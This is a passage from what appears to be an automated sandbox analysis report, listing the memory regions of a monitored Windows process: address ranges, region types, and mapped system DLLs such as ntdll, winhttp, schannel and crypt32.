425 start_va = 0x7ffc0cde0000 end_va = 0x7ffc0ce89fff entry_point = 0x7ffc0cde0000 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 426 start_va = 0x7ffc0d190000 end_va = 0x7ffc0d314fff entry_point = 0x7ffc0d190000 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\System32\\Windows.Globalization.dll" (normalized: "c:\\windows\\system32\\windows.globalization.dll") Region: id = 427 start_va = 0x7ffc0d320000 end_va = 0x7ffc0d57ffff entry_point = 0x7ffc0d320000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 428 start_va = 0x7ffc0ed40000 end_va = 0x7ffc0edd7fff entry_point = 0x7ffc0ed40000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 429 start_va = 0x7ffc0f6f0000 end_va = 0x7ffc0f781fff entry_point = 0x7ffc0f6f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 430 start_va = 0x7ffc0f810000 end_va = 0x7ffc0f825fff entry_point = 0x7ffc0f810000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 431 start_va = 0x7ffc0fa30000 end_va = 0x7ffc0fa9ffff entry_point = 0x7ffc0fa30000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 432 start_va = 0x7ffc0fad0000 end_va = 0x7ffc0fad6fff entry_point = 0x7ffc0fad0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 433 start_va = 0x7ffc10110000 end_va = 0x7ffc101b0fff entry_point = 0x7ffc10110000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 434 start_va = 0x7ffc10420000 end_va = 0x7ffc10448fff entry_point = 0x7ffc10420000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 435 start_va = 0x7ffc10450000 end_va = 0x7ffc10485fff entry_point = 0x7ffc10450000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 436 start_va = 0x7ffc10490000 end_va = 0x7ffc109d4fff entry_point = 0x7ffc10490000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 437 start_va = 0x7ffc109e0000 end_va = 0x7ffc10c4efff entry_point = 0x7ffc109e0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 438 start_va = 0x7ffc10d80000 end_va = 0x7ffc10f30fff entry_point = 0x7ffc10d80000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 439 start_va = 0x7ffc11050000 end_va = 0x7ffc1107ffff entry_point = 0x7ffc11050000 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\System32\\globinputhost.dll" (normalized: "c:\\windows\\system32\\globinputhost.dll") Region: id = 440 start_va = 0x7ffc110f0000 end_va = 0x7ffc11582fff entry_point = 0x7ffc110f0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 441 start_va = 0x7ffc11590000 end_va = 0x7ffc115f6fff entry_point = 0x7ffc11590000 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 442 start_va = 0x7ffc11690000 end_va = 0x7ffc11731fff entry_point = 0x7ffc11690000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 443 start_va = 0x7ffc11740000 end_va = 0x7ffc119e7fff entry_point = 0x7ffc11740000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 444 start_va = 0x7ffc119f0000 end_va = 0x7ffc11a11fff entry_point = 0x7ffc119f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 445 start_va = 0x7ffc11b00000 end_va = 0x7ffc11be2fff entry_point = 0x7ffc11b00000 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 446 start_va = 0x7ffc11ef0000 end_va = 0x7ffc12075fff entry_point = 0x7ffc11ef0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 447 start_va = 0x7ffc120e0000 end_va = 0x7ffc120f2fff entry_point = 0x7ffc120e0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 448 start_va = 0x7ffc12100000 end_va = 0x7ffc12124fff entry_point = 0x7ffc12100000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 449 start_va = 0x7ffc12130000 end_va = 0x7ffc1215bfff entry_point = 0x7ffc12130000 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 450 start_va = 0x7ffc12160000 end_va = 0x7ffc12184fff entry_point = 0x7ffc12160000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 451 start_va = 0x7ffc12190000 end_va = 0x7ffc121b2fff entry_point = 0x7ffc12190000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 452 start_va = 0x7ffc12300000 end_va = 0x7ffc12378fff entry_point = 0x7ffc12300000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 453 start_va = 0x7ffc123a0000 end_va = 0x7ffc12435fff entry_point = 0x7ffc123a0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 454 start_va = 0x7ffc12440000 end_va = 0x7ffc12466fff entry_point = 0x7ffc12440000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 455 start_va = 0x7ffc12540000 end_va = 0x7ffc1263ffff entry_point = 0x7ffc12540000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 456 start_va = 0x7ffc127a0000 end_va = 0x7ffc127d1fff entry_point = 0x7ffc127a0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 457 start_va = 0x7ffc12bc0000 end_va = 0x7ffc12cb3fff entry_point = 0x7ffc12bc0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 458 start_va = 0x7ffc12e30000 end_va = 0x7ffc12e3bfff entry_point = 0x7ffc12e30000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 459 start_va = 0x7ffc136a0000 end_va = 0x7ffc136ccfff entry_point = 0x7ffc136a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 460 start_va = 0x7ffc13830000 end_va = 0x7ffc13885fff entry_point = 0x7ffc13830000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 461 start_va = 0x7ffc13950000 end_va = 0x7ffc13978fff entry_point = 0x7ffc13950000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 462 start_va = 0x7ffc13a20000 end_va = 0x7ffc13a33fff entry_point = 0x7ffc13a20000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 463 start_va = 0x7ffc13a40000 end_va = 0x7ffc13a8afff entry_point = 0x7ffc13a40000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 464 start_va = 0x7ffc13a90000 end_va = 0x7ffc13a9ffff entry_point = 0x7ffc13a90000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 465 start_va = 0x7ffc13aa0000 end_va = 0x7ffc13aaefff entry_point = 0x7ffc13aa0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 466 start_va = 0x7ffc13b60000 end_va = 0x7ffc13be5fff entry_point = 0x7ffc13b60000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 467 start_va = 0x7ffc13bf0000 end_va = 0x7ffc13c44fff entry_point = 0x7ffc13bf0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 468 start_va = 0x7ffc13c50000 end_va = 0x7ffc14293fff entry_point = 0x7ffc13c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 469 start_va = 0x7ffc142a0000 end_va = 0x7ffc142b6fff entry_point = 0x7ffc142a0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 470 start_va = 0x7ffc142c0000 end_va = 0x7ffc14486fff entry_point = 0x7ffc142c0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 471 start_va = 0x7ffc14490000 end_va = 0x7ffc144d2fff entry_point = 0x7ffc14490000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 472 start_va = 0x7ffc144e0000 end_va = 0x7ffc14549fff entry_point = 0x7ffc144e0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 473 start_va = 0x7ffc14550000 end_va = 0x7ffc14737fff entry_point = 0x7ffc14550000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 474 start_va = 0x7ffc14740000 end_va = 0x7ffc147f4fff entry_point = 0x7ffc14740000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 475 start_va = 0x7ffc14800000 end_va = 0x7ffc14942fff entry_point = 0x7ffc14800000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 476 start_va = 0x7ffc14950000 end_va = 0x7ffc14a6bfff entry_point = 0x7ffc14950000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 477 start_va = 0x7ffc14a70000 end_va = 0x7ffc15fcefff entry_point = 0x7ffc14a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 478 start_va = 0x7ffc15fd0000 end_va = 0x7ffc1624cfff entry_point = 0x7ffc15fd0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 479 start_va = 0x7ffc16250000 end_va = 0x7ffc162f6fff entry_point = 0x7ffc16250000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 480 start_va = 0x7ffc164b0000 end_va = 0x7ffc1654cfff entry_point = 0x7ffc164b0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 481 start_va = 0x7ffc16550000 end_va = 0x7ffc165f6fff entry_point = 0x7ffc16550000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 482 start_va = 0x7ffc16660000 end_va = 0x7ffc166bafff entry_point = 0x7ffc16660000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 483 start_va = 0x7ffc166c0000 end_va = 0x7ffc167cafff entry_point = 0x7ffc166c0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 484 start_va = 0x7ffc167d0000 end_va = 0x7ffc1680afff entry_point = 0x7ffc167d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 485 start_va = 0x7ffc16810000 end_va = 0x7ffc16969fff entry_point = 0x7ffc16810000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 486 start_va = 0x7ffc16970000 end_va = 0x7ffc169dafff entry_point = 0x7ffc16970000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 487 start_va = 0x7ffc169e0000 end_va = 0x7ffc16b65fff entry_point = 0x7ffc169e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 488 start_va = 0x7ffc16b70000 end_va = 0x7ffc16f98fff entry_point = 0x7ffc16b70000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 489 start_va = 0x7ffc16fb0000 end_va = 0x7ffc17070fff entry_point = 0x7ffc16fb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 490 start_va = 0x7ffc17110000 end_va = 0x7ffc17116fff entry_point = 0x7ffc17110000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 491 start_va = 0x7ffc17120000 end_va = 0x7ffc171ccfff entry_point = 0x7ffc17120000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 492 start_va = 0x7ffc171d0000 end_va = 0x7ffc17325fff entry_point = 0x7ffc171d0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 493 start_va = 0x7ffc17330000 end_va = 0x7ffc1739efff entry_point = 0x7ffc17330000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 494 start_va = 0x7ffc173a0000 end_va = 0x7ffc173f1fff entry_point = 0x7ffc173a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 495 start_va = 0x7ffc17400000 end_va = 0x7ffc175c0fff entry_point = 0x7ffc17400000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 496 start_va = 0x20f9a2d0000 end_va = 0x20f9a2d3fff entry_point = 0x20f9a2d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 497 start_va = 0x7ffc133a0000 end_va = 0x7ffc133b6fff entry_point = 0x7ffc133a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 498 start_va = 0x7ffc13030000 end_va = 0x7ffc13063fff entry_point = 0x7ffc13030000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 499 start_va = 0x7ffc134c0000 end_va = 0x7ffc134cafff entry_point = 0x7ffc134c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 500 start_va = 0x8192100000 end_va = 0x81921fffff entry_point = 0x0 region_type = private name = "private_0x0000008192100000" filename = "" Region: id = 501 start_va = 0x20f9a300000 end_va = 0x20f9a318fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a300000" filename = "" Region: id = 502 start_va = 0x20f9a320000 end_va = 0x20f9a338fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a320000" filename = "" Region: id = 503 start_va = 0x20f9c360000 end_va = 0x20f9c378fff entry_point = 0x0 region_type = private name = "private_0x0000020f9c360000" filename = "" Region: id = 504 start_va = 0x7ffc079e0000 end_va = 0x7ffc07b97fff entry_point = 0x7ffc079e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 505 start_va = 0x7ffc0d740000 end_va = 0x7ffc0dac1fff entry_point = 0x7ffc0d740000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1686 start_va = 0x20f94500000 end_va = 0x20f94508fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94500000" filename = "" Region: id = 1687 start_va = 0x20f94510000 end_va = 0x20f94518fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94510000" filename = "" Region: id = 1688 start_va = 0x20f94520000 end_va = 0x20f9452afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94520000" filename = "" Region: id = 1689 start_va = 0x20f94540000 end_va = 0x20f9454afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f94540000" filename = "" Region: id = 1690 start_va = 0x20f9a1f0000 end_va = 0x20f9a1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9a1f0000" filename = "" Region: id = 1691 start_va = 0x20f9a2a0000 end_va = 0x20f9a2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9a2a0000" filename = "" Region: id = 1692 start_va = 0x20f9a2e0000 end_va = 0x20f9a2e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9a2e0000" filename = "" Region: id = 1693 start_va = 0x20f9a300000 end_va = 0x20f9a301fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a300000" filename = "" Region: id = 1694 start_va = 0x20f9a310000 end_va = 0x20f9a311fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a310000" filename = "" Region: id = 1695 start_va = 0x20f9a320000 end_va = 0x20f9a320fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a320000" filename = "" Region: id = 1696 start_va = 0x20f9a330000 end_va = 0x20f9a33ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9a330000" filename = "" Region: id = 1697 start_va = 0x20f9a350000 end_va = 0x20f9a350fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a350000" filename = "" Region: id = 1698 start_va = 0x20f9b490000 end_va = 0x20f9b491fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b490000" filename = "" Region: id = 1699 start_va = 0x20f9b520000 end_va = 0x20f9b520fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b520000" filename = "" Region: id = 1700 start_va = 0x20f9ca10000 end_va = 0x20f9ca1ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9ca10000" filename = "" Region: id = 1701 start_va = 0x20f9d7f0000 end_va = 0x20fa040dfff entry_point = 0x20f9d7f0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1702 start_va = 0x20fa08f0000 end_va = 0x20fa18bffff entry_point = 0x0 region_type = private name = "private_0x0000020fa08f0000" filename = "" Region: id = 1703 start_va = 0x7ffc0f200000 end_va = 0x7ffc0f2c7fff entry_point = 0x7ffc0f200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1704 start_va = 0x8192300000 end_va = 0x81923fffff entry_point = 0x0 region_type = private name = "private_0x0000008192300000" filename = "" Region: id = 1705 start_va = 0x7ffc0c8d0000 end_va = 0x7ffc0c907fff entry_point = 0x7ffc0c8d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1706 start_va = 0x7ffc16fa0000 end_va = 0x7ffc16fa7fff entry_point = 0x7ffc16fa0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1707 start_va = 0x7ffc0c510000 end_va = 0x7ffc0c525fff entry_point = 0x7ffc0c510000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1708 start_va = 0x7ffc0c4f0000 end_va = 0x7ffc0c509fff entry_point = 0x7ffc0c4f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1709 start_va = 0x7ffc0b3b0000 end_va = 0x7ffc0b3c4fff entry_point = 0x7ffc0b3b0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1710 start_va = 0x20f99360000 end_va = 0x20f99360fff entry_point = 0x20f99360000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1711 start_va = 0x7ffc12490000 end_va = 0x7ffc12539fff entry_point = 0x7ffc12490000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1712 start_va = 0x7ffc132f0000 end_va = 0x7ffc1334bfff entry_point = 0x7ffc132f0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1713 start_va = 0x7ffc0c430000 end_va = 0x7ffc0c43afff entry_point = 0x7ffc0c430000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1714 start_va = 0x7ffc03f90000 end_va = 0x7ffc0400ffff entry_point = 0x7ffc03f90000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1715 start_va = 0x20f99370000 end_va = 0x20f99374fff entry_point = 0x20f99370000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1716 start_va = 0x20f99380000 end_va = 0x20f9938ffff entry_point = 0x20f99380000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1717 start_va = 0x7ffc0ad10000 end_va = 0x7ffc0ad19fff entry_point = 0x7ffc0ad10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1718 start_va = 0x7ffc0c360000 end_va = 0x7ffc0c3c6fff entry_point = 0x7ffc0c360000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1719 start_va = 0x7ffc12f70000 end_va = 0x7ffc12fe9fff entry_point = 0x7ffc12f70000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1720 start_va = 0x20f99390000 end_va = 0x20f99391fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f99390000" filename = "" Region: id = 1721 start_va = 0x20f993a0000 end_va = 0x20f993a2fff entry_point = 0x0 region_type = private name = "private_0x0000020f993a0000" filename = "" Region: id = 1722 start_va = 0x7ffc03cc0000 end_va = 0x7ffc03cd3fff entry_point = 0x7ffc03cc0000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1723 start_va = 0x7ffc13550000 end_va = 0x7ffc13589fff entry_point = 0x7ffc13550000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1724 start_va = 0x7ffc13590000 end_va = 0x7ffc135b6fff entry_point = 0x7ffc13590000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1725 start_va = 0x8192400000 end_va = 0x81924fffff entry_point = 0x0 region_type = private name = "private_0x0000008192400000" filename = "" Region: id = 1726 start_va = 0x7ffc03d40000 end_va = 0x7ffc03d5dfff entry_point = 0x7ffc03d40000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1727 start_va = 0x7ffc09ed0000 end_va = 0x7ffc0a031fff entry_point = 0x7ffc09ed0000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 1728 start_va = 0x7ffc13070000 end_va = 0x7ffc13079fff entry_point = 0x7ffc13070000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1729 start_va = 0x20f973b0000 end_va = 0x20f977bffff entry_point = 0x0 region_type = private name = "private_0x0000020f973b0000" filename = "" Region: id = 1730 start_va = 0x20f977c0000 end_va = 0x20f97bc3fff entry_point = 0x0 region_type = private name = "private_0x0000020f977c0000" filename = "" Region: id = 1731 start_va = 0x20f97bd0000 end_va = 0x20f97fd1fff entry_point = 0x0 region_type = private name = "private_0x0000020f97bd0000" filename = "" Region: id = 1732 start_va = 0x7ffc138b0000 end_va = 0x7ffc13948fff entry_point = 0x7ffc138b0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: 